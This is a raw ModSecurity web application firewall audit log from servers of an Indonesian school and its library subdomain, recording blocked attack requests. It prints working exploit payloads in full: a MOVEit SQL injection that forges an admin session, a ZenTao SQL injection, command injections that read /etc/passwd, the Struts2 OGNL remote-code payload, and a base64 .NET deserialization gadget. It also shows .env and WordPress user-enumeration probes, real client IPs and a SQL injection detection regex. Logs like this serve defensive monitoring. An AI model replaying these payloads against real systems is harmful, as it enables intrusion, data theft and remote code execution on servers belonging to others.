Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --745a284e-Z-- --6168b60b-A-- [23/May/2025:00:13:17 +0700] aC9bLeThJmFSRJ5-OZfpuwAAAEY 103.236.140.4 60044 103.236.140.4 8181 --6168b60b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 46.29.224.18 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 46.29.224.18 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --6168b60b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6168b60b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747933997640391 2150 (- - -) Stopwatch2: 1747933997640391 2150; combined=982, p1=342, p2=613, p3=0, p4=0, p5=27, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6168b60b-Z-- --68c72c62-A-- [23/May/2025:00:32:25 +0700] aC9fqSektx75wRFPQygHDQAAANQ 103.236.140.4 60242 103.236.140.4 8181 --68c72c62-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.117.209 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.117.209 X-Forwarded-Proto: https Connection: close User-Agent: SonyEricssonK750i/R1CA Browser/SEMC-Browser/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 Accept-Charset: utf-8 --68c72c62-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --68c72c62-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747935145302568 934 (- - -) Stopwatch2: 1747935145302568 934; combined=349, p1=291, p2=0, p3=0, p4=0, p5=58, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --68c72c62-Z-- --82140113-A-- [23/May/2025:00:37:58 +0700] aC9g9uThJmFSRJ5-OZfp2AAAAFE 103.236.140.4 60272 103.236.140.4 8181 --82140113-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.83.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.83.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.80 Safari/537.36 Accept-Charset: utf-8 --82140113-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --82140113-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747935478029370 736 (- - -) Stopwatch2: 1747935478029370 736; combined=285, p1=252, p2=0, p3=0, p4=0, p5=33, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --82140113-Z-- --c08e8a01-A-- [23/May/2025:00:39:57 +0700] aC9hbeThJmFSRJ5-OZfp3AAAAEE 103.236.140.4 60284 103.236.140.4 8181 --c08e8a01-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 203.176.129.61 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 203.176.129.61 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c08e8a01-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c08e8a01-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747935597793798 2947 (- - -) Stopwatch2: 1747935597793798 2947; combined=1280, p1=460, p2=790, p3=0, p4=0, p5=30, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c08e8a01-Z-- --f79f9a41-A-- [23/May/2025:00:52:50 +0700] aC9kciektx75wRFPQygHKQAAANM 103.236.140.4 60420 103.236.140.4 8181 --f79f9a41-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.117.209 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.117.209 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.87 Safari/537.36 Accept-Charset: utf-8 --f79f9a41-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f79f9a41-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747936370144292 838 (- - -) Stopwatch2: 1747936370144292 838; combined=340, p1=295, p2=0, p3=0, p4=0, p5=45, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f79f9a41-Z-- --96c96a62-A-- [23/May/2025:01:08:36 +0700] aC9oJH0O04WKE1HJ5iR7igAAABc 103.236.140.4 32932 103.236.140.4 8181 --96c96a62-B-- POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 0 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.1 Safari/605.1.15 Ax-silock-transaction: folder_add_by_path X-siLock-SessVar0: MyUsername: Guest X-siLock-SessVar1: MyPkgAccessCode: 123 X-siLock-SessVar2: MyGuestEmailAddr: my_guest_email@example.com X-siLock-Transaction: session_setvars X-Forwarded-For: 154.26.179.43, 103.236.140.4 Cookie: siLockLongTermInstID=0; SenayanMember=c7copsa976qr9ectsiv2cj1713 X-Varnish: 163523812 --96c96a62-C-- --96c96a62-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --96c96a62-E-- --96c96a62-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".dll"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747937316123761 3402 (- - -) Stopwatch2: 1747937316123761 3402; combined=1684, p1=493, p2=1159, p3=0, p4=0, p5=32, sr=83, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --96c96a62-Z-- --d558aa41-A-- [23/May/2025:01:08:39 +0700] aC9oJ-ThJmFSRJ5-OZfqCgAAAE8 103.236.140.4 32942 103.236.140.4 8181 --d558aa41-B-- POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 0 User-Agent: python-requests/2.26.0 Accept: */* Ax-silock-transaction: folder_add_by_path X-siLock-SessVar0: MyPkgID: 0 X-siLock-SessVar1: MyPkgSelfProvisionedRecips: SQL Injection'); INSERT INTO activesessions (SessionID) values ('2xMkyuOd6a871djR3qUJHUPPvjy');UPDATE activesessions SET Username=(select Username from users order by permission desc limit 1) WHERE SessionID='2xMkyuOd6a871djR3qUJHUPPvjy';UPDATE activesessions SET LoginName='test@test.com' WHERE SessionID='2xMkyuOd6a871djR3qUJHUPPvjy';UPDATE activesessions SET RealName='test@test.com' WHERE SessionID='2xMkyuOd6a871djR3qUJHUPPvjy';UPDATE activesessions SET InstId='1234' WHERE SessionID='2xMkyuOd6a871djR3qUJHUPPvjy';UPDATE activesessions SET IpAddress='154.26.179.43' WHERE SessionID='2xMkyuOd6a871djR3qUJHUPPvjy';UPDATE activesessions SET LastTouch='2099-06-10 09:30:00' WHERE SessionID='2xMkyuOd6a871djR3qUJHUPPvjy';UPDATE activesessions SET DMZInterface='10' WHERE SessionID='2xMkyuOd6a871djR3qUJHUPPvjy';UPDATE activesessions SET Timeout='60' WHERE SessionID='2xMkyuOd6a871djR3qUJHUPPvjy';UPDATE activesessions SET ResilNode='10' WHERE SessionID='2xMkyuOd6a871djR3qUJHUPPvjy';UPDATE activesessions SET AcctReady='1' WHERE SessionID='2xMkyuOd6a871djR3qUJHUPPvjy'; -- asdf X-siLock-Transaction: session_setvars X-Forwarded-For: 154.26.179.43 Cookie: siLockLongTermInstID=0; SenayanMember=c7copsa976qr9ectsiv2cj1713 X-Varnish: 163523815 --d558aa41-C-- --d558aa41-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: 
close Content-Type: text/html; charset=iso-8859-1 --d558aa41-E-- --d558aa41-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".dll"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747937319138757 2374 (- - -) Stopwatch2: 1747937319138757 2374; combined=1261, p1=317, p2=918, p3=0, p4=0, p5=26, sr=60, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d558aa41-Z-- --0b7ff339-A-- [23/May/2025:01:13:21 +0700] aC9pQSektx75wRFPQygHNgAAAMo 103.236.140.4 32970 103.236.140.4 8181 --0b7ff339-B-- POST /zentao/user-login.html HTTP/1.0 Referer: https://perpustakaan.smkn22jakarta.sch.id/zentao/user-login.html Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 72 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 45.32.66.146 Cookie: X-Varnish: 166344378 --0b7ff339-C-- account=admin'+and++updatexml(1,concat(0x1,md5(999999999)),1)+and+'1'='1 --0b7ff339-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0b7ff339-E-- --0b7ff339-H-- Message: Access denied with code 403 (phase 2). 
Pattern match "[\\[\\]\\x22',()\\.]{10}$|\\b(?:union\\sall\\sselect\\s(?:(?:null|\\d+),?)+|order\\sby\\s\\d{1,4}|(?:and|or)\\s\\d{4}=\\d{4}|waitfor\\sdelay\\s'\\d+:\\d+:\\d+'|(?:select|and|or)\\s(?:(?:pg_)?sleep\\(\\d+\\)|\\d+\\s?=\\s?(?:dbms_pipe\\.receive_message\\ ..." at ARGS_POST:account. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "66"] [id "218500"] [rev "18"] [msg "COMODO WAF: SQLmap attack detected||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: and '1'='1 found within ARGS_POST:account: admin' and updatexml(1,concat(0x1,md5(999999999)),1) and '1'='1"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747937601539420 3376 (- - -) Stopwatch2: 1747937601539420 3376; combined=1634, p1=483, p2=1120, p3=0, p4=0, p5=31, sr=88, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0b7ff339-Z-- --831bbc10-A-- [23/May/2025:01:13:21 +0700] aC9pQeThJmFSRJ5-OZfqEQAAAEQ 103.236.140.4 32982 103.236.140.4 8181 --831bbc10-B-- POST /bsh.servlet.BshServlet HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 58 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 45.32.66.146 Cookie: X-Varnish: 166635396 --831bbc10-C-- bsh.script=exec("cat+/etc/passwd");&bsh.servlet.output=raw --831bbc10-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --831bbc10-E-- --831bbc10-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /bsh.servlet.BshServlet"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747937601546493 1766 (- - -) Stopwatch2: 1747937601546493 1766; combined=544, p1=356, p2=160, p3=0, p4=0, p5=28, sr=65, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --831bbc10-Z-- --29db3550-A-- [23/May/2025:01:13:21 +0700] aC9pQSektx75wRFPQygHOAAAAMg 103.236.140.4 32976 103.236.140.4 8181 --29db3550-B-- POST /portal/login_init.action HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 0 User-Agent: Java/1.8.0_333 Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Cache-Control: no-cache Content-Type: %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo 8yx7htwjwg').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())} Pragma: no-cache X-Forwarded-For: 45.32.66.146 Cookie: X-Varnish: 163523821 --29db3550-C-- --29db3550-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --29db3550-H-- Message: Access denied with code 403 (phase 2). Match of "rx ^(?:\\w+\\/[\\w\\-\\.]+)(?:;(?:charset=[\\w\\-]{1,18}|boundary=[\\w\\-]+)?)?$" against "REQUEST_HEADERS:Content-Type" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "6743"] [id "243930"] [rev "2"] [msg "COMODO WAF: Remote code execution in Apache Struts versions 2.3.31 - 2.3.5 and 2.5 - 2.5.10 (CVE-2017-5638)||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747937601545452 3398 (- - -) Stopwatch2: 1747937601545452 3398; combined=1952, p1=322, p2=1603, p3=0, p4=0, p5=27, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --29db3550-Z-- --e16be56e-A-- [23/May/2025:01:13:21 +0700] aC9pQeThJmFSRJ5-OZfqEwAAAFA 103.236.140.4 32996 103.236.140.4 8181 --e16be56e-B-- POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 25 User-Agent: Mozilla/5.0 (Windows NT 11.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/103.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 45.32.66.146 Cookie: X-Varnish: 166635399 --e16be56e-C-- type='|cat /etc/passwd||' --e16be56e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e16be56e-E-- --e16be56e-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /webadm/?q=moni_detail.do&action=gragh"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747937601550006 1541 (- - -) Stopwatch2: 1747937601550006 1541; combined=481, p1=345, p2=107, p3=0, p4=0, p5=28, sr=72, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e16be56e-Z-- --20ec0876-A-- [23/May/2025:01:19:15 +0700] aC9qoyektx75wRFPQygHPgAAAMU 103.236.140.4 33038 103.236.140.4 8181 --20ec0876-B-- POST /K3Cloud/Kingdee.BOS.ServiceFacade.ServicesStub.User.UserService.SaveUserPassport.common.kdsvc HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 15909 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: zh-CN,zh;q=0.9 Content-Type: text/json cmd: echo QZPuWzkJnV X-Forwarded-For: 45.32.66.146 Cookie: X-Varnish: 162993415 --20ec0876-C-- 
{"ap0":"AAEAAAD/////AQAAAAAAAAAMAgAAAFdTeXN0ZW0uV2luZG93cy5Gb3JtcywgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAACFTeXN0ZW0uV2luZG93cy5Gb3Jtcy5BeEhvc3QrU3RhdGUBAAAAEVByb3BlcnR5QmFnQmluYXJ5BwICAAAACQMAAAAPAwAAAMctAAACAAEAAAD/////AQAAAAAAAAAEAQAAAH9TeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5MaXN0YDFbW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAwAAAAZfaXRlbXMFX3NpemUIX3ZlcnNpb24FAAAICAkCAAAACgAAAAoAAAAQAgAAABAAAAAJAwAAAAkEAAAACQUAAAAJBgAAAAkHAAAACQgAAAAJCQAAAAkKAAAACQsAAAAJDAAAAA0GBwMAAAABAQAAAAEAAAAHAgkNAAAADA4AAABhU3lzdGVtLldvcmtmbG93LkNvbXBvbmVudE1vZGVsLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49MzFiZjM4NTZhZDM2NGUzNQUEAAAAalN5c3RlbS5Xb3JrZmxvdy5Db21wb25lbnRNb2RlbC5TZXJpYWxpemF0aW9uLkFjdGl2aXR5U3Vycm9nYXRlU2VsZWN0b3IrT2JqZWN0U3Vycm9nYXRlK09iamVjdFNlcmlhbGl6ZWRSZWYCAAAABHR5cGULbWVtYmVyRGF0YXMDBR9TeXN0ZW0uVW5pdHlTZXJpYWxpemF0aW9uSG9sZGVyDgAAAAkPAAAACRAAAAABBQAAAAQAAAAJEQAAAAkSAAAAAQYAAAAEAAAACRMAAAAJFAAAAAEHAAAABAAAAAkVAAAACRYAAAABCAAAAAQAAAAJFwAAAAkYAAAAAQkAAAAEAAAACRkAAAAJGgAAAAEKAAAABAAAAAkbAAAACRwAAAABCwAAAAQAAAAJHQAAAAkeAAAABAwAAAAcU3lzdGVtLkNvbGxlY3Rpb25zLkhhc2h0YWJsZQcAAAAKTG9hZEZhY3RvcgdWZXJzaW9uCENvbXBhcmVyEEhhc2hDb2RlUHJvdmlkZXIISGFzaFNpemUES2V5cwZWYWx1ZXMAAAMDAAUFCwgcU3lzdGVtLkNvbGxlY3Rpb25zLklDb21wYXJlciRTeXN0ZW0uQ29sbGVjdGlvbnMuSUhhc2hDb2RlUHJvdmlkZXII7FE4PwIAAAAKCgMAAAAJHwAAAAkgAAAADw0AAAAAEAAAAk1akAADAAAABAAAAP//AAC4AAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAAOH7oOALQJzSG4AUzNIVRoaXMgcHJvZ3JhbSBjYW5ub3QgYmUgcnVuIGluIERPUyBtb2RlLg0NCiQAAAAAAAAAUEUAAEwBAwAnQZBkAAAAAAAAAADgAAIhCwELAAAIAAAABgAAAAAAAP4mAAAAIAAAAEAAAAAAABAAIAAAAAIAAAQAAAAAAAAABAAAAAAAAAAAgAAAAAIAAAAAAAADAECFAAAQAAAQAAAAABAAABAAAAAAAAAQAAAAAAAAAAAAAACkJgAAVwAAAABAAACoAgAAAAAAAAAAAAAAAAAAAAAAAABgAAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAgAAAAAAAAAAAAAAAggAABIAAAAAAAAAAAAAAAudGV4dAAAAAQHAAAAIAAAAAgA
AAACAAAAAAAAAAAAAAAAAAAgAABgLnJzcmMAAACoAgAAAEAAAAAEAAAACgAAAAAAAAAAAAAAAAAAQAAAQC5yZWxvYwAADAAAAABgAAAAAgAAAA4AAAAAAAAAAAAAAAAAAEAAAEIAAAAAAAAAAAAAAAAAAAAA4CYAAAAAAABIAAAAAgAFADAhAAB0BQAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAbMAMAwwAAAAEAABECKAMAAAooBAAACgoGbwUAAApvBgAACgZvBwAACm8IAAAKcwkAAAoLB28KAAAKcgEAAHBvCwAACgZvDAAACm8NAAAKchEAAHBvDgAACgwHbwoAAApyGQAAcAgoDwAACm8QAAAKB28KAAAKF28RAAAKB28KAAAKF28SAAAKB28KAAAKFm8TAAAKB28UAAAKJgdvFQAACm8WAAAKDQZvBwAACglvFwAACt4DJt4ABm8HAAAKbxgAAAoGbwcAAApvGQAACioAARAAAAAAIgCHqQADDgAAAUJTSkIBAAEAAAAAAAwAAAB2NC4wLjMwMzE5AAAAAAUAbAAAANABAAAjfgAAPAIAAHQCAAAjU3RyaW5ncwAAAACwBAAAJAAAACNVUwDUBAAAEAAAACNHVUlEAAAA5AQAAJAAAAAjQmxvYgAAAAAAAAACAAABRxQCAAkAAAAA+iUzABYAAAEAAAAOAAAAAgAAAAEAAAAZAAAAAgAAAAEAAAABAAAABAAAAAAACgABAAAAAAAGACkAIgAGAFYANgAGAHYANgAKAKgAnQAKAMAAnQAKAOgAnQAOABsBCAEOACMBCAEKAE8BnQAOAIYBZwEGAK8BIgASACQCGgIGAEQCGgIGAGkCIgAAAAAAAQAAAAAAAQABAAAAEAAXAAAABQABAAEAUCAAAAAAhhgwAAoAAQARADAADgAZADAACgAJADAAC